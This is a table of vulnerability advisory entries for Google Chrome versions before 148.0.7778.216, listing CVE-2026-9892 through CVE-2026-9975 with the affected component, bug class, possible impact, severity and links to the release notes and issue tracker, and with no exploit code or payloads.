| Google--Chrome | Inappropriate implementation in Skia in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9892 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513948178 |
| Google--Chrome | Use after free in Skia in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9893 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513972075 |
| Google--Chrome | Use after free in GPU in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9894 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/507707838 |
| Google--Chrome | Out of bounds read in GPU in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9895 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/491685406 |
| Google--Chrome | Out of bounds write in V8 in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9896 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/508811474 |
| Google--Chrome | Use after free in DOM in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9897 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/496271580 |
| Google--Chrome | Insufficient validation of untrusted input in GPU in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9898 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/496282591 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9899 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/497533569 |
| Google--Chrome | Out of bounds write in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9900 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/497637277 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9901 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/497737770 |
| Google--Chrome | Use after free in Accessibility in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9902 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/498205735 |
| Google--Chrome | Insufficient validation of untrusted input in Site Isolation in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted MHTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9903 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/498783665 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9904 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/498804020 |
| Google--Chrome | Use after free in Accessibility in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9905 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/498883610 |
| Google--Chrome | Out of bounds write in GPU in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9906 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/499005260 |
| Google--Chrome | Out of bounds read in Dawn in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9907 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/499091269 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9908 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/499091328 |
| Google--Chrome | Integer overflow in Skia in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9909 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/499152771 |
| Google--Chrome | Out of bounds memory access in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9910 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/499176133 |
| Google--Chrome | Integer overflow in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9911 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/499205491 |
| Google--Chrome | Inappropriate implementation in GPU in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9912 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/499873765 |
| Google--Chrome | Inappropriate implementation in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9913 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500046096 |
| Google--Chrome | Insufficient validation of untrusted input in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9914 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500047428 |
| Google--Chrome | Heap buffer overflow in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9915 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500063836 |
| Google--Chrome | Out of bounds write in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9916 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500080303 |
| Google--Chrome | Uninitialized Use in WebGL in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9917 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500095304 |
| Google--Chrome | Inappropriate implementation in Tint in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9918 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500099471 |
| Google--Chrome | Out of bounds read in WebGL in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9919 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500114058 |
| Google--Chrome | Uninitialized Use in GPU in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9920 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500138014 |
| Google--Chrome | Uninitialized Use in WebGL in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin information via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9921 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500150338 |
| Google--Chrome | Use after free in GPU in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9922 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500187083 |
| Google--Chrome | Use after free in Skia in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9923 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500393328 |
| Google--Chrome | Heap buffer overflow in ANGLE in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9924 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500398345 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9925 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500536458 |
| Google--Chrome | Heap buffer overflow in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9926 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500540748 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9927 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500540958 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9928 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/501125002 |
| Google--Chrome | Inappropriate implementation in WebGL in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9929 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/501367791 |
| Google--Chrome | Out of bounds write in Dawn in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9930 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/501499832 |
| Google--Chrome | Use after free in GPU in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9931 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/501524262 |
| Google--Chrome | Use after free in ANGLE in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9932 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/501563323 |
| Google--Chrome | Use after free in Input in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9933 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/501575979 |
| Google--Chrome | Use after free in Aura in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9934 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/501576946 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9935 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/501584689 |
| Google--Chrome | Use after free in GFX in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9936 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/502104354 |
| Google--Chrome | Use after free in UI in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9937 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/502112506 |
| Google--Chrome | Inappropriate implementation in V8 in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9938 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/502300817 |
| Google--Chrome | Heap buffer overflow in WebCodecs in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9939 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/502735235 |
| Google--Chrome | Heap buffer overflow in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9940 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/502738003 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9941 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/502812366 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9942 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503438092 |
| Google--Chrome | Out of bounds read in WebGL in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9943 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503464551 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9944 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503471286 |
| Google--Chrome | Use after free in Media in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9945 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503565293 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9946 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503596863 |
| Google--Chrome | Use after free in XML in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9947 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503627446 |
| Google--Chrome | Use after free in Views in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9948 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503790201 |
| Google--Chrome | Use after free in Core in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9949 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503793153 |
| Google--Chrome | Insufficient validation of untrusted input in iOS in Google Chrome on iOS prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9950 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503862359 |
| Google--Chrome | Use after free in UI in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9951 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503873388 |
| Google--Chrome | Use after free in WebAudio in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9952 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503929476 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9953 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503985322 |
| Google--Chrome | Use after free in TabStrip in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9954 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504175497 |
| Google--Chrome | Inappropriate implementation in iOS in Google Chrome on iOS prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9955 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504184408 |
| Google--Chrome | Use after free in iOS in Google Chrome on iOS prior to 148.0.7778.216 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9956 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504195132 |
| Google--Chrome | Use after free in PDF in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted PDF file. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9957 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504516117 |
| Google--Chrome | Use after free in PDFium in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9958 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504555886 |
| Google--Chrome | Race in WebRTC in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9959 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504557432 |
| Google--Chrome | Integer overflow in PDFium in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted font file. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9960 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504573260 |
| Google--Chrome | Use after free in SurfaceCapture in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9961 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504710769 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9962 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504716948 |
| Google--Chrome | Uninitialized Use in iOS in Google Chrome on iOS prior to 148.0.7778.216 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9963 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/505143241 |
| Google--Chrome | Use after free in Bluetooth in Google Chrome on Mac prior to 148.0.7778.216 allowed an attacker who convinced a user to install a malicious extension to execute arbitrary code via a crafted Chrome Extension. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9964 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/505190999 |
| Google--Chrome | Out of bounds write in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9965 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/506377574 |
| Google--Chrome | Integer overflow in XML in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9966 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/506388321 |
| Google--Chrome | Out of bounds write in GPU in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9967 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/506414791 |
| Google--Chrome | Integer overflow in V8 in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9968 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/506499280 |
| Google--Chrome | Insufficient validation of untrusted input in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9969 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/506550494 |
| Google--Chrome | Use after free in WebGL in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9970 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/506653647 |
| Google--Chrome | Inappropriate implementation in iOS in Google Chrome on iOS prior to 148.0.7778.216 allowed a remote attacker who convinced a user to engage in specific UI gestures to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9971 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/508448586 |
| Google--Chrome | Uninitialized Use in Gamepad in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9972 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/508463705 |
| Google--Chrome | Out of bounds write in V8 in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9973 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/509268941 |
| Google--Chrome | Out of bounds write in GPU in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9974 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511710468 |
| Google--Chrome | Out of bounds read and write in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-9975 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511719039 |
